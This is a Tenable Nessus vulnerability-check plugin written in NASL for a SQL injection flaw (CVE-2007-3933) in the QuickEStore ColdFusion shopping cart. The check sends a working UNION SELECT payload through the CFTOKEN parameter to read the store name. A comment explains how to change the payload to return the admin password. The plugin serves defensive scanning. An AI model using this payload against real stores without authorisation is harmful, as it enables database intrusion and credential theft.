#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a Cold Fusion script that is prone to a
SQL injection attack. 

Description :

The remote host is running QuickEStore, a shopping cart application
writtein in Cold Fusion. 

The version of QuickEStore installed on the remote host fails to
sanitize input to the 'CFTOKEN' parameter of the 'insertorder.cfm'
script before using it in database queries.  An unauthenticated
attacker can exploit this issue to manipulate database queries, which
may lead to disclosure of sensitive information (such as the store's
administrative password), modification of data, or attacks against the
underlying database. 

See also :

http://www.milw0rm.com/exploits/4193

Solution :

Unknown at this time. 

Risk factor : 

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(26001);
  script_version("$Revision: 1.2 $");

  script_cve_id("CVE-2007-3933");
  script_bugtraq_id(24961);
  script_xref(name:"OSVDB", value:"36358");

  script_name(english:"QuickEStore CFTOKEN parameter SQL Injection Vulnerability");
  script_summary(english:"Tries to get the store's name");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/store", "/shop", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to exploit the issue to retrieve the store's name. Change
  # "storename" to "password" to return the admin password!
  exploit = string('1 UNION SELECT 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from Params"having 1=1');
  req = http_get(
    item:string(
      dir, "/insertorder.cfm?",
      "CFID=1&",
      "CFTOKEN=", urlencode(str:exploit)
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # If it looks like the exploit worked...
  if ("Calculate item total" >< res)
  {
    # Grab the value.
    value = NULL;

    pat = 'name="att2" value="([^"]+)">';
    matches = egrep(pattern:pat, string:res);
    foreach match (split(matches))
    {
      match = chomp(match);
      item = eregmatch(pattern:pat, string:match);
      if (!isnull(item))
      {
        value = item[1];
        break;
      }
    }

    # There's a problem if we have it.
    if (value)
    {
      report = string(
        desc,
        "\n\n",
        "Plugin output :\n",
        "\n",
        "Nessus was able to exploit this vulnerability to retrieve the store's\n",
        "name (", value, ")."
      );
      security_hole(port:port, data:report);
      exit(0);
    }
  }
}
